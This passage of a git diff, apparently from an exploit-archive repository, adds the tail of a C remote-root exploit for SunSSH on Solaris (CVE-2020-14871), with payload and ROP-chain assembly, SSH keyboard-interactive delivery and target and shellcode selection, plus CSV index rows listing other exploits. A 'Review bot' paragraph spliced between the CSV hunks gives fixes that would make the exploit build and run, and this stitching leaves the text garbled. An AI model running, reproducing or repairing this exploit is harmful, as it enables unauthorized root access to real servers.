fatal payload buffer error\n"); + exit(-1); + } + srand(time(NULL)); + memset(buf,'\x00',payload_size); + memset(randbuf,0,2); + printf("[-] shellcode length %d bytes\n",len); + if(len < 512 && payload_size > 1024){ + memcpy(buf,payload,len); + for(int i =0;i <= (512 - len);i++){ + randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52]; + memcpy(randbuf,&randchar,1); + strcat(buf,randbuf); + } + len = strlen(retaddr); + printf("[-] rop chain length %d\n",len); + if(len + 512 < payload_size){ + memcpy((void*)(long)buf+512,(void*)retaddr,len); + len = strlen(buf); + printf("[-] exploit buffer length %d\n",len); + } + else{ + printf("[!] exploit buffer miscalculated\n"); + exit(-1); + } + } + else{ + printf("[!] exploit buffer miscalculated\n"); + exit(-1); + } +} + +static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) { + int i = 0; + signal(SIGALRM, &on_alarm); + printf("[+] entering keyboard-interactive authentication.\n"); + printf("[-] number of prompts: %d\n", num_prompts); + printf("[-] prompt %d from server: '", i); + fwrite(prompts[i].text, 1, prompts[i].length, stdout); + printf("'\n"); + prepare_payload(); + //uncomment to pause for gdb debugging + //sleep(10); + responses[i].text = strdup(buf); + responses[i].length = strlen(buf); + printf("[-] sending exploit magic buffer... 
wait\n"); + alarm(5); +} + +int main(int argc,char **argv){ + int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0; + char* host; + int i, type, exitcode; + unsigned long hostaddr; + const char *fingerprint; + LIBSSH2_SESSION *session; + LIBSSH2_CHANNEL *channel; + char *exitsignal = (char *)"none"; + size_t len; + LIBSSH2_KNOWNHOSTS *nh; + static struct option options[] = { + {"server", 1, 0, 's'}, + {"port", 1, 0, 'p'}, + {"target", 1, 0, 't'}, + {"shellcode", 1, 0, 'x'}, + {"help", 0, 0,'h'} + }; + printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n"); + while(rc != -1) { + rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index); + switch(rc) { + case -1: + break; + case 's': + if(ihost==0){ + host = malloc(strlen(optarg) + 1); + if(host){ + sprintf(host,"%s",optarg); + ihost = 1; + } + } + break; + case 'p': + port = atoi(optarg); + break; + case 'x': + if(ishell==-1) { + rc = atoi(optarg); + switch(rc){ + case 0: + printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); + payload = malloc(strlen(shellcodes[rc].shellcode)+1); + if(payload){ + memset(payload,0,strlen(shellcodes[rc].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); + ishell = rc; + } + break; + case 1: + printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); + payload = malloc(strlen(shellcodes[rc].shellcode)+1); + if(payload){ + memset(payload,0,strlen(shellcodes[rc].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); + ishell = rc; + } + break; + case 2: + printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); + payload = malloc(strlen(shellcodes[rc].shellcode)+1); + if(payload){ + memset(payload,0,strlen(shellcodes[rc].shellcode)+1); + 
memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); + ishell = rc; + } + break; + case 3: + printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); + payload = malloc(strlen(shellcodes[rc].shellcode)+1); + if(payload){ + memset(payload,0,strlen(shellcodes[rc].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); + ishell = rc; + } + break; + + default: + printf("[!] Invalid shellcode selection %d\n",rc); + exit(0); + break; + } + } + break; + case 't': + if(itarg==0){ + rc = atoi(optarg); + switch(rc){ + case 0: + printf("[-] chosen target '%s'\n",targets[rc].name); + retaddr = malloc(strlen(targets[rc].ropchain)+1); + if(retaddr){ + memset(retaddr,0,strlen(targets[rc].ropchain)+1); + memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); + itarg = rc; + } + break; + case 1: + printf("[-] chosen target '%s'\n",targets[rc].name); + retaddr = malloc(strlen(targets[rc].ropchain)+1); + if(retaddr){ + memset(retaddr,0,strlen(targets[rc].ropchain)+1); + memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); + itarg = rc; + } + break; + case 2: + printf("[-] chosen target '%s'\n",targets[rc].name); + retaddr = malloc(strlen(targets[rc].ropchain)+1); + if(retaddr){ + memset(retaddr,0,strlen(targets[rc].ropchain)+1); + memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); + itarg = rc; + } + break; + case 3: + printf("[-] chosen target '%s'\n",targets[rc].name); + retaddr = malloc(strlen(targets[rc].ropchain)+1); + if(retaddr){ + memset(retaddr,0,strlen(targets[rc].ropchain)+1); + memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); + itarg = rc; + } + break; + case 4: + printf("[-] chosen target '%s'\n",targets[rc].name); + retaddr = malloc(strlen(targets[rc].ropchain)+1); + if(retaddr){ + 
memset(retaddr,0,strlen(targets[rc].ropchain)+1); + memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); + itarg = rc; + } + break; + default: + printf("[!] Invalid target selection %d\n", rc); + exit(0); + break; + } + itarg = 1; + } + break; + case 'h': + printf("[!] Usage instructions.\n[\n"); + printf("[ %s (optional)\n[\n[ --server|-s \n",argv[0]); + printf("[ --port|-p (port)[default 22]\n[ --target|-t \n"); + printf("[ --shellcode|-x \n[\n"); + printf("[ Target#'s\n"); + for(i = 0;i <= targetno - 1;i++){ + printf("[ %d \"%s\"\n",i,targets[i]); + } + printf("[\n[ Shellcode#'s\n"); + for(i = 0;i <= shellno - 1;i++){ + printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode)); + } + printf("\e[0m"); + exit(0); + break; + default: + break; + } + } + if(itarg != 1 || ihost != 1 || ishell < 0){ + printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]); + exit(-1); + } + rc = libssh2_init(0); + hostaddr = inet_addr(host); + sd = socket(AF_INET, SOCK_STREAM, 0); + sain.sin_family = AF_INET; + sain.sin_port = htons(port); + sain.sin_addr.s_addr = hostaddr; + if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) { + fprintf(stderr, "[!] failed to connect!\n"); + goto shutdown; + } + session = libssh2_session_init(); + libssh2_session_set_blocking(session, 1); + while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN); + if(rc) { + printf("[!] failure establishing ssh session: %d\n", rc); + goto shutdown; + } + nh = libssh2_knownhost_init(session); + if(!nh) { + printf("[!] 
failure on libssh2 init\n");
+ goto shutdown;
+ }
+ fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
+ printf("[+] ssh host fingerprint: ");
+ for(i = 0; i < 20; i++) {
+ printf("%02x", (unsigned char)fingerprint[i]);
+ }
+ printf("\n");
+ libssh2_knownhost_free(nh);
+ signal(SIGINT,&on_interrupt);
+ libssh2_userauth_keyboard_interactive(session, "", &kbd_callback);
+ printf("[!] exploit failed, core maybe on target!\n");
+shutdown:
+ if(sd){
+ close(sd);
+ }
+ printf("\e[0m");
+ return -2;
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7875249b9..1bda1cfd5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11231,6 +11231,7 @@ id,file,description,date,author,type,platform,port
 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
 49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
+49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
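Review bot: In the `--help` branch of `main`, `printf("[ %d \"%s\"\n",i,targets[i]);` passes a whole `struct target` by value where `%s` expects a `char *`; that is undefined behaviour and on an x86-64 build will print garbage or crash, so it should be `targets[i].name`, as the shellcode loop two lines below already does with `shellcodes[i].name`. `hostaddr = inet_addr(host)` is never checked, so a hostname or a typo in `-s` yields `INADDR_NONE` and the tool silently tries to connect to 255.255.255.255; compare against `INADDR_NONE` (or switch to `inet_pton`) before `connect`. The file also cannot be built as shown: the `# Exploit Title:` through `# Tested on:` lines at the top are invalid preprocessor directives to `gcc` and need a `/* ... */` wrapper, and the `#include` lines render empty here, presumably because the angle-bracketed header names were stripped on the way into the corpus. Smaller points: the forward declaration is `on_interupt` while the definition and the `signal(SIGINT, ...)` call use `on_interrupt`, and every `strlen` result is printed with `%d` rather than `%zu`.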
@@ -18340,6 +18341,7 @@ id,file,description,date,author,type,platform,port
 49216,exploits/windows/remote/49216.py,"SmarterMail Build 6985 - Remote Code Execution",2020-12-09,1F98D,remote,windows,
 49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
 49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
+49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43476,3 +43478,6 @@ id,file,description,date,author,type,platform,port
 49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
 49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
 49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
+49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
+49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
+49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,